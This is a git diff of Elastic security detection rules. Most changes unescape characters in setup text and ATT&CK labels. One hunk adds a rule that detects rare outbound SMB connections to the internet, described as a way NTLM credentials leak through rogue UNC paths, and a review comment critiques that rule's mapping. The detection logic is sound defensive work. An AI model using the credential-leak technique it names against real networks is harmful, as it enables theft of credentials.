+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json
index 776d2f2a9c7..2f99164ad0b 100644
--- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_105.json
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json
index 8a42f6d9b8b..5c0831a2fb3 100644
--- a/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f44fa4b6-524c-4e87-8d9e-a32599e4fb7c_106.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f44fa4b6-524c-4e87-8d9e-a32599e4fb7c",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json
index 6c369fe18d9..e31cc1fc98e 100644
--- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_105.json
@@ -56,7 +56,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d",
- "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```",
+ "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -78,7 +78,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json
index 9fb5f43e4a1..d4479e49a11 100644
--- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_106.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d",
- "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```",
+ "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -73,7 +73,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json
index fdcc376ffdc..1aaee8feecb 100644
--- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_107.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d",
- "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```",
+ "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -73,7 +73,7 @@
 "technique": []
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json
index 7b5d308accc..14c88cf317e 100644
--- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_108.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d",
- "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```",
+ "setup": "The 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json
index f4d127ad7ec..cdbf9b348a7 100644
--- a/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/f494c678-3c33-43aa-b169-bb3d5198c41d_109.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 73,
 "rule_id": "f494c678-3c33-43aa-b169-bb3d5198c41d",
- "setup": "\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policy Configuration \u003e\nAudit Policies \u003e\nPolicy Change \u003e\nAudit Authorization Policy Change (Success,Failure)\n```\n",
+ "setup": "\nThe 'Audit Authorization Policy Change' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policy Configuration >\nAudit Policies >\nPolicy Change >\nAudit Authorization Policy Change (Success,Failure)\n```\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -80,7 +80,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json
index 211011aa49c..ca3d0459bcd 100644
--- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_1.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json
index a5c3044a27a..d3aad414569 100644
--- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_2.json
@@ -51,7 +51,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json
index f5746bf1a41..8f37a0bcb37 100644
--- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_3.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json
index d284d500367..39be1a81be3 100644
--- a/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json
+++ b/packages/security_detection_engine/kibana/security_rule/f530ca17-153b-4a7a-8cd3-98dd4b4ddf73_4.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json
index cfd8f06dc5c..5f7a5f81303 100644
--- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_104.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json
index d82419516a1..e61813755e7 100644
--- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_105.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json
index 9423fc1bf8c..4c34c8f7c92 100644
--- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_106.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json
index 532dc088bd6..c777bf73e1f 100644
--- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_107.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json
index c20ddd7e390..1596239a271 100644
--- a/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc_108.json
@@ -50,7 +50,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "low",
 "tags": [
 "Domain: Endpoint",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json
index a7a066b7ccd..ec2fd874338 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_1.json
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -86,7 +86,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json
index 3123e9ffa43..a32cd82c53e 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5488ac1-099e-4008-a6cb-fb638a0f0828_2.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
@@ -85,7 +85,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_1.json b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_1.json
new file mode 100644
index 00000000000..64eb56d8b2a
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/f580bf0a-2d23-43bb-b8e1-17548bb947ec_1.json
@@ -0,0 +1,106 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule detects rare internet network connections via the SMB protocol. SMB is commonly used to leak NTLM credentials via rogue UNC path injection.",
+ "from": "now-9m",
+ "history_window_start": "now-7d",
+ "index": [
+ "logs-endpoint.events.*",
+ "winlogbeat-*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "Rare SMB Connection to the Internet",
+ "new_terms_fields": [
+ "destination.ip"
+ ],
+ "query": "event.category:network and host.os.type:windows and process.pid:4 and \n network.transport:tcp and destination.port:(139 or 445) and \n source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n",
+ "references": [
+ "https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "destination.port",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "event.category",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.transport",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pid",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "source.ip",
+ "type": "ip"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Exfiltration",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0010",
+ "name": "Exfiltration",
+ "reference": "https://attack.mitre.org/tactics/TA0010/"
+ },
+ "technique": [
+ {
+ "id": "T1048",
+ "name": "Exfiltration Over Alternative Protocol",
+ "reference": "https://attack.mitre.org/techniques/T1048/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "new_terms",
+ "version": 1
+ },
+ "id": "f580bf0a-2d23-43bb-b8e1-17548bb947ec_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json
index 51f3bda2fd2..4b7509b4f31 100644
--- a/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/f5861570-e39a-4b8a-9259-abd39f84cb97_1.json
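Review bot: The ATT&CK mapping in `threat` (TA0010 with T1048 Exfiltration Over Alternative Protocol) does not match the behaviour the `description` actually describes — NTLM credential leakage through rogue UNC paths — which MITRE files under Credential Access as T1187 Forced Authentication. Either add a second `threat` entry for TA0006 with T1187 and a matching `"Tactic: Credential Access"` tag, or reword the description so the rule's stated intent and its mapping agree. Separately, the `source.ip` clause admits only the three RFC 1918 ranges, so hosts addressed from 100.64.0.0/10 or from public space never match even though 100.64.0.0/10 is carefully listed in the destination exclusion; if that narrowing is deliberate, a `false_positives` or `note` entry should say so rather than leave the next maintainer to infer it. The rule also ships with no `note` or `setup` text at all, unlike the neighbouring rules in this package, so triage guidance for a `new_terms` alert on `destination.ip` is missing.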
@@ -48,7 +48,7 @@
 ],
 "risk_score": 21,
 "rule_id": "f5861570-e39a-4b8a-9259-abd39f84cb97",
- "setup": "The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure). Steps to implement the logging policy with Advanced Audit Configuration: ``` Computer Configuration \u003e Policies \u003e Windows Settings \u003e Security Settings \u003e Advanced Audit Policies Configuration \u003e Audit Policies \u003e DS Access \u003e Audit Directory Service Access (Success,Failure) ```",
